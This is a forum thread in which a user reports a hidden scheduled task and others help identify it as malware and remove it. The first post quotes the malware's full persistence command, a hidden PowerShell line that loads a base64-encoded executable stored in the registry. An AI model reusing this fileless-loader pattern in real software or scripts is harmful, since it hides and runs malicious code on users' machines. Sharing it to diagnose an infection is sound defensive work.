something is trolling my pc? serious or harmless

Discussion in 'PC' started by EddieXx, Dec 30, 2021.

  1. EddieXx

    EddieXx Audiosexual

    Joined:
    Sep 13, 2015
    Messages:
    1,316
    Likes Received:
    761
    I dont often have weird things going on with my pc, but this time something is bothering me

    it started with this powershell window (i think) opening up and closing suddenly like a flash every 10 or 15 min.

    So i thought maybe something was scheduled, i went to scheduler and sure i found something, it went under the name of:
    Name: Wexlx
    Location: \
    Trigger: to be run every 10 minutes when started - activated
    Action: Start a program.
    Info: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Wexlx\).Jliadf)).EntryPoint.Invoke($Null,$Null)


    So I went to regeditor and there is this "Wexlx", under "HKEY_CURRENT _USER" - "SOFTWARE" with two entries:

    Name (Standard) Type: REG_SZ (NO VALUE)
    Name Jliadf Type: REG_EXPAND_SZ

    (inside Jliadf there is a long ass string i found it easier to capture screen)

    [​IMG]

    Any clue of what this can be?
     
    Last edited: Dec 30, 2021
    • Interesting Interesting x 1
    • List
  2.  
  3. BEAT16

    BEAT16 Audiosexual

    Joined:
    May 24, 2012
    Messages:
    9,081
    Likes Received:
    7,009
    The photo is not displayed. Do you have a few pictures?
     
  4. uhub

    uhub Kapellmeister

    Joined:
    Dec 9, 2016
    Messages:
    181
    Likes Received:
    70
    Seems like adware or spyware or crytobot, comes with any crack keygen, uninstall if you've installed any program from unknown source recently and restore from restore point... :like:

    I always disable powershell and use CLI with admin right instead since Wannacry malware was spread :guru:
     
    • Like Like x 2
    • Agree Agree x 2
    • List
  5. clone

    clone Audiosexual

    Joined:
    Feb 5, 2021
    Messages:
    7,567
    Likes Received:
    3,334
    normally with windows junk like this, the real trick in removal is getting the program to not execute at startup. Otherwise you would be able to delete any malicious files. Once it is loaded at startup you cannot.

    Say this one creates a registry entry. Alot of times the author knows you will find this, and then also writes lines into your win.ini, system.ini, and other places. You have to get rid of any reference which launches the app into memory.
     
    • Like Like x 1
    • Agree Agree x 1
    • List
  6. BEAT16

    BEAT16 Audiosexual

    Joined:
    May 24, 2012
    Messages:
    9,081
    Likes Received:
    7,009
    Take this one: adwcleaner

    Free Download Malwarebytes AdwCleaner 8 full version standalone offline installer for Windows PC, the world’s most popular adware cleaner, finds and removes unwanted programs and junkware. Hence, your online experience stays optimal and hassle-free.

    https://filecr.com/windows/malwarebytes-adwcleaner/?id=6225444086
     
  7. Sylenth.Will.Fall

    Sylenth.Will.Fall Audiosexual

    Joined:
    Aug 21, 2015
    Messages:
    2,668
    Likes Received:
    1,846
    No I don't but a simple system restore should fit it.


    Sorry to step on your toes a bit with the system restore suggestion. I hadn't seen your post yet when typing mine.
     
  8. EddieXx

    EddieXx Audiosexual

    Joined:
    Sep 13, 2015
    Messages:
    1,316
    Likes Received:
    761
    thanks for the heads-up, the task was created on Christmas eve and i didn't even used the pc around those days, but it was turned on.

    the latest two programs with potential risk are a free eq for OBS called "Blue Cats Triple Eq", and dumb enough a @ffinity ph@hoto and designer (i needed to test something) one with a regular gen and the other with a fake gen of some sort, i thought i had stopped it in time and cleaned it up, but it could be that is still present. or the eq.

    Other than that i havent installed anything but updated to legit software for a very long time.
     
  9. nyaa13

    nyaa13 Producer

    Joined:
    Jul 21, 2019
    Messages:
    102
    Likes Received:
    75
    • Like Like x 2
    • Interesting Interesting x 1
    • List
  10. EddieXx

    EddieXx Audiosexual

    Joined:
    Sep 13, 2015
    Messages:
    1,316
    Likes Received:
    761
    very observant of you to notice he worked with video too! it must be related.

    and that there is no other record of this but that is interesting, i wonder wtf this can be that created an entry in the registry without any other record, HKCU:\Software\Wexlx\).Jliadf, besides the scheduled task..

    to bad registry entries dont point to any location in the system
     
    Last edited: Dec 30, 2021
  11. uhub

    uhub Kapellmeister

    Joined:
    Dec 9, 2016
    Messages:
    181
    Likes Received:
    70
    No it's okay rather i should be thanking you as i have forgotten about sylenth, after seeing your name i can recall the last one i downloaded was in the end part of 2016 from AoN, i now will update my sylenth, haven't used that for a long time :like:

    Hmm such nonsense are very sticky once installed you can't get rid of them easily at all...

    Is your OS, host file, browser extensions, registries are clean ??? :dunno:

    Correct, another one is desktop.ini, everytime i delete it comes back again in many places, can you tell me how to delete .ini and .macosx files permanently ??? :bow:
     
  12. Sylenth.Will.Fall

    Sylenth.Will.Fall Audiosexual

    Joined:
    Aug 21, 2015
    Messages:
    2,668
    Likes Received:
    1,846
    You're very welcome..,Glad to be of assistance.
     
  13. EddieXx

    EddieXx Audiosexual

    Joined:
    Sep 13, 2015
    Messages:
    1,316
    Likes Received:
    761
    well, have been doing some research scanning, cleaning and deleting.

    shows that "auslogics duplicate file finder" was causing some problems and probably some miner activity of some sort.

    i deactivated suspect auto-runs and deleted registry entries like "Wexlx", and it seems it was targeting powershell, to what purpose? unkown.

    but i got rid of the problem. no more freezing powershell popping up so far
     
  14. Xupito

    Xupito Audiosexual

    Joined:
    Jan 21, 2012
    Messages:
    7,292
    Likes Received:
    4,028
    Location:
    Europe
    This sounds a lot like malware. This line is converting that long string in the registry into a file and then loading (as a .dll) or executing it.

    Base64 is way to convert and then write binary data (like files) in a text format. It's used in web programming for instance.
    As long you delete that fucker entry you should be good. Well done explaining your problem, you did your homework.
     
    Last edited: Dec 30, 2021
    • Like Like x 4
    • Agree Agree x 1
    • Winner Winner x 1
    • Love it! Love it! x 1
    • List
  15. r4e

    r4e Audiosexual

    Joined:
    Sep 6, 2014
    Messages:
    869
    Likes Received:
    1,247
    Do you still have that base64 entry from your picture?
    Would be nice to see what's inside. If yes, please send it to me.
     
    • Like Like x 1
    • Agree Agree x 1
    • List
  16. Xupito

    Xupito Audiosexual

    Joined:
    Jan 21, 2012
    Messages:
    7,292
    Likes Received:
    4,028
    Location:
    Europe
    I already feel bad for that Windows virtual machine... :rofl:
     
  17. EddieXx

    EddieXx Audiosexual

    Joined:
    Sep 13, 2015
    Messages:
    1,316
    Likes Received:
    761
    wow, thanks Xupito, didnt know you had this insight. i really wanted to know what that meant/did but i thought there was no point in asking here, i thought wrong thought hehe

    you mean the one in the registry? i cant copy the string. if it doenst simply end like in the picture i posted earlier, it ends in those dots .... but maybe its just because the string is too long?
     
    Last edited: Dec 30, 2021
  18. EddieXx

    EddieXx Audiosexual

    Joined:
    Sep 13, 2015
    Messages:
    1,316
    Likes Received:
    761
    btw i could export it! i uploaded it here as a text file, is that ok?

    https://filebin.net/gh4ggjatstqm066s
     
  19. r4e

    r4e Audiosexual

    Joined:
    Sep 6, 2014
    Messages:
    869
    Likes Received:
    1,247
    Ye, thats fine. While decoding, I immediately got a malware popup from my Antivirus.
    Will take a deeper look. I hope you already deleted that key from the registry because indeed
    it's an executable malware translated to base64.
    The Powershell script most likely decodes that code into its executable form and runs it.

    Here are the scan results for that file:
    https://www.virustotal.com/gui/file...ba9e39a16ae6a27ffdfb943409557a22837/detection
     
    Last edited: Dec 30, 2021
    • Agree Agree x 1
    • Love it! Love it! x 1
    • List
  20. Xupito

    Xupito Audiosexual

    Joined:
    Jan 21, 2012
    Messages:
    7,292
    Likes Received:
    4,028
    Location:
    Europe
    It's only normal. First productive shit I say here in years :rofl:
    There's some really talented people when it comes to computers here, more than me. @r4e is one of them. I still remember that custom installer GUI for EzKeys man!! :beg::shalom:
     
    Last edited: Dec 31, 2021
    • Like Like x 2
    • Love it! Love it! x 1
    • List
  21. Klangfarbe

    Klangfarbe Newbie

    Joined:
    Dec 30, 2021
    Messages:
    7
    Likes Received:
    2
    Hey, you could delete that desktop.ini billion times it will always come back. Has a simple reason.

    "The desktop. ini file is a hidden file used to store information about the arrangement of a Windows folder. Essentially, if the layout or settings for a folder are changed, a desktop. ini file is automatically generated to save those changes."


    So to answer your question, no you can't delete this files permanent, it is a necessary part of windows :yes:
     
    Last edited: Jan 6, 2022
Loading...
Loading...